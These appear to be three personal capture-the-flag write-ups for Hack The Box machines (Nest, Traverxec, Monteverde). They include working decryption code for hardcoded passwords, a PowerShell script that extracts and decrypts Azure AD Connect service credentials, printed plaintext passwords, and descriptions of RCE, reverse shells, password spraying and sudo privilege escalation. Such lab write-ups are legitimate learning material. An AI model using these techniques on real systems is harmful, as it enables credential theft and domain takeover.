Running a quick nmap scan for vulnerabilities doesn’t give us anything.

We get the hostname.

Enum4Linux doesn’t get us much, access is denied for most checks.

Smbclient gives us the directories so lets play around and see whats here.

We can access secure but not the actual files.

We don’t have access to any of the Users directories.

And SMBmap doesn’t give us anything to work with.

We switch to windows and map a drive to quickly run through it and we find the foothold credentials in the Data folder.

And we have our foothold with the TEMPUSER user.

User enumeration

We have greater access with tempuser so lets keep going through files.

In the Notepad++ config we can see C.Smith has a history file in \Secure$\

We cant list the IT folder but we know Carl\ exists..

We take a chance at trying to go to Carls directory and awesome we have some permissions to this directory.. lets see whats in here…

first few files are useless but it looks like carl has hardcoded some of his credentials for a VB program in RU_Config.xml.

We can see many Public Property Username/password references in different files but nothing we can use..

We find the RU_Config.xml file in the Data fileshare.

Sure enoughh we find the user and a hashed or encrypted password. None of the files we saw earlier had extra information for us but we did find some interesting vb files that seem relevant. We go through them and find some interesting cryptography functions;

Key pieces of information we will need are

    dim cipherText As String="fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
    dim passPhrase As String="N3st22"
    dim saltValue As String="88552299"
    dim passwordIterations AS INTEGER=2 
    dim initVector As String="464R5DFA5DL6LE28"
    dim keySize AS INTEGER=256

So we now have the information we need, we know how the tool encrypts and decrypts passwords and we have the hardcoded default salts etc. We build the below code in visual studio, using the RU-Scanner code as the base.

Imports System
Imports System.IO
Imports System.Text
Imports System.Security.Cryptography
Imports System.Text.Encoding
Imports Microsoft.VisualBasic
Module Program
    Sub Main()
        Dim cipherText As String = "fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="
        Dim passPhrase As String = "N3st22"
        Dim saltValue As String = "88552299"
        Dim passwordIterations As Integer = 2
        Dim initVector As String = "464R5DFA5DL6LE28"
        Dim keySize As Integer = 256

        Dim initVectorBytes As Byte()
        initVectorBytes = System.Text.Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = System.Text.Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = System.Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length)


        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount)

    End Sub
End Module

Running this we see the password as xRxRxPANCAK3SxRxRx

We have the user flag.

Enumerating User 2

Now we have user 2 lets go back to enumerating the SMB shares. SMB is still the only tool we can use, the box is fun but very CTFish.

Looks like there is a port open for HQK queries that our NMAP missed.

Running strings against the HQKLDAP.exe file we found doesn’t give us much information but when we disassemble it, we see the version is 1.2.0 but googling suggests this isn’t a real tool so we shouldn’t expect public exploits.

Decompiling the exe and going through the code doesn’t give us any answers.

Our Nmap scan on the port gives us feedback including commands we can post to the server on that port. Maybe telnet is the answer here?

So it looks like we have a simple interface with this service through telnet, We have an option to debug the service but will need a password to do so. Carls password isn’t helping us, so we go back to the empty text file we found and see if it has the password.

After poking around with the file we find a handy smb command, allinfo which shows us 2 streams, including 1 password stream with 15 bytes.

 We try to get this stream and we have potentially gotten a password; WBQ201953D8w . Lets try it with telnet first and if it isn’t accepted we will need to check the exe code to see what we need to do.

It is accepted. We have 3 new commands, Service, Session and ShowQuery.

So we can see some info for the queries but nothing that helps us, we also cannot leave the 1-3 range of the app.

We cant seem to run any of these queries.

We also cant navigate to the network location. Lets review the decompiled .exe we found in carls home directory again. We see a cryptography section in the code that mimics the functionality we used to get user but the method it uses, IV and salt etc are slightly different but even if we know how to decrypt this password and we still need to find the password hash.

After scratching our head for awhile we realise we can use the showquery, list and setdir commands to navigate around the application director and doing this we find the administrator credentials including an encrypted password= yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Decrypt
    class decrypt
        static void Main(string[] args)
            string cipherText = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=";
            string passPhrase = "667912";
            string saltValue = "1313Rf99";
            int passwordIterations = 3;
            string initVector = "1L1SA61493DRV53Z";
            int keySize = 256;

            byte[] bytes1 = Encoding.ASCII.GetBytes(initVector);
            byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
            byte[] buffer = Convert.FromBase64String(cipherText);
            byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked((int)Math.Round(unchecked((double)keySize / 8.0))));
            AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider();
            cryptoServiceProvider.Mode = CipherMode.CBC;
            ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1);
            MemoryStream memoryStream = new MemoryStream(buffer);
            CryptoStream cryptoStream = new CryptoStream((Stream)memoryStream, decryptor, CryptoStreamMode.Read);
            byte[] numArray = new byte[checked(buffer.Length + 1)];
            int count = cryptoStream.Read(numArray, 0, numArray.Length);
            string v = Encoding.ASCII.GetString(numArray, 0, count);
            string plaintext = v;

We put together this C# code using the decompiled source code as a base, and run it.

Success, password for admin is XtH4nkS4Pl4y1nGX.

We login with this credential and are able to get the key!

The big lessons learned here that cost me alot of time was firstly to enumerate all thing things and make note of findings that might not be used till later, and secondly to learn more about the applications i am using, even custom applications as that can help with enumeration.


This box is a mixture of CVEs, mis-configurations and GTFObins

Run Nmap

Quick scan shows us a webserver and ssh are open. We will run a more intensive scan to double check and get dirb running. We also see Nostromo 1.9.6 is the webserver running. While those scans run lets research this.

Run Dirb

Nostromo exploit

We see an RCE; and

Lets give CVE-2019-16278 a try.

We have rce! 😊 Lets try and get a shell before proceeding. Using as a guide we try for a bash shell.

We setup a simple python webserver to host our shell.

We are able to upload our shell to /tmp

We run it

And we get shell! Time to move to user enumeration.

Enumerating for user

We see our target user David.

Going through the server bit by bit e see the Nostromo config file and this give us a lot of good info – the server admin name and the location of the password in .htpasswd.

We have the password hash – now lets crack it!

Running john on the hash gets us the password; Nowonly4me

We arnt able to ssh with these credentials so they must be for something else so lets keep looking.

Checking out the MAN page for nostromos, it looks like we can navigate to the home directories because of how the server is set up. lets try it

The web page itself gave us nothing and after tearing our hair out for several hours we try to cd directly to the directory.. and it works… ouch.

Going through the public_www folder we find a subdirectory that is quite interesting. It looks like we have an ssh key, lets unzip it and get Davids ssh cert.

We have issues running john to crack the password protected rsa key, after some googling we find a script that will run a dictionary attack against the file and we find the pasword to the private key is hunter. Lets try to ssh as David now.

We got user.txt and ssh access to David!

Enumerating to root.

Shortly after starting to explore David we find this shell script that lets us use sudo for the Journalctl command. Dusting off our trusty GTFOBins spellbook we find the incantation we need;

After some playing around we were able to identify the correct place to enter the GTFOBin command and get a root shell. Happy days.

Interesting box, foothold and root was easy but user took ages to figure!


This is an interesting box that mixed lazy admins with the risks of cloud based authentication.

Run nmap

First time in HTB nmap says the host is down. Wonder if somebody has been messing with the box or its part of the challenge. Lets force Nmap to scan even with the box showing its down with -pN as a flag.

Interesting, they have TCPWrappers enabled. We can see that LDAP, SMB, DNS and Kerberos ports are open by looking at the port numbers but there is some obfuscation. As this seems to be a windows box lets enumerate with enum4linux and follow up findings with impacket and see if we can find a way in.


Decent bit of information we now have users – including a juicy sounding SABatchJobs account, the domain and some groups. Maybe we should try some kerbroasting like we learned about with Sauna.

Kerberos enumeration

Reviewing the blog;  and lets use kerbrute to confirm the usernames.

Impacket and kerbroasting seem to be a dead end, so lets try enumerating some more with SMB.

SMB enumeration.

We confirm SMB is running with CME and an additional nmap scan. We recently discovered a new pentesting tool called RPCClient which should give us a low privilege shell. Using this guide, we proceed;

We find additional information on privileges and are able to drill down into the user accounts we found previously, we see only 3 accounts have logged in previously, lets focus on these as we know these are good.

SMB bruteforce

After playing around with these 3 usernames and running into issues with both MSF and CME. Trying rockyou as the password list didnt work for us until we started trying the usernames as password and found SABatchJobs password was SABatchjobs. Bighead would be proud.

We did spend about 3 hours trying to get smbclient to work, the quarantine and coffee shortages are having an impact on my life.. but luckily literally the first thing we checked has the second users password, mhope. I am a ball luck right now! 😊 When we ran cme for winrm we found it was open, so using evil-winrm, a tool we used in a previous HTB, we can try for shell.

Looks like we are successful.

And we have user.

Evil-Winrm enumeration

Starting to enumerate with winrm we check the services and see the big service is SQL running on this box and Azure ADConnect. We will need to enumerate with some scripts though

We upload PowerSploit, and Sherlock.

None of these tools give us anything to work with, box seems solid.

A friend reminds us the use the /all paramete for WhoAmI and it shows us that mhope is in the MEGABANK\Azure Admins group. This stands out as suspicious. But lets enumerate SQL server first as it seems more likely than azure.

Enumerating SQL Server

We can see this is SQL server so lets focus on that. Googling gives us an enum guide we will use as SQL Servers and us are not a good match 😮

Trying the use MSF to log in with mhope doesn’t work. Seems Mhope isnt allowed to access SQL. Going back to googling/researching what we found so far a wild blog suddenly appears that chains our two findings together; Best of all VBScrub wrote it who is a very good hacker who always offers awesome advise on the HTB forums.

The exploit

We read through the original exploit VBScrub linked to; and use his code to create a ps1 file, reading through the code, doesn’t seem to be anything we will need to change. But now lets upload it with winrm and execute.. lets see what happens.

We upload it as normal and when we run it evil winrm cuts out. We didnt think of this at the time but we should have loaded the module into Evil-WinRm but we didnt realise our mistake. We did notice it was showing the file being execute from my kali machine. Reading back over the blog we see that “you also need to make sure the mcrypt.dll from the download link is in the same directory the program is in.” we try this and try adding mcrypt.dll to our path, but neither is successful, keeps cutting out.

We decided to run the following code that we found line by line, its different to the above as it hardcodes the mcrypt.dll location;

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = $server; Database = $db; Initial Catalog=$db; 
Integrated Security = True;"
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)

add-type -path "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}

"[+] Domain:  " + $domain.Domain
"[+] Username: " + $username.Username
"[+]Password: " + $password.Password

This is pretty awesome, we get the credentials.

And we are admin with the root.txt 🙂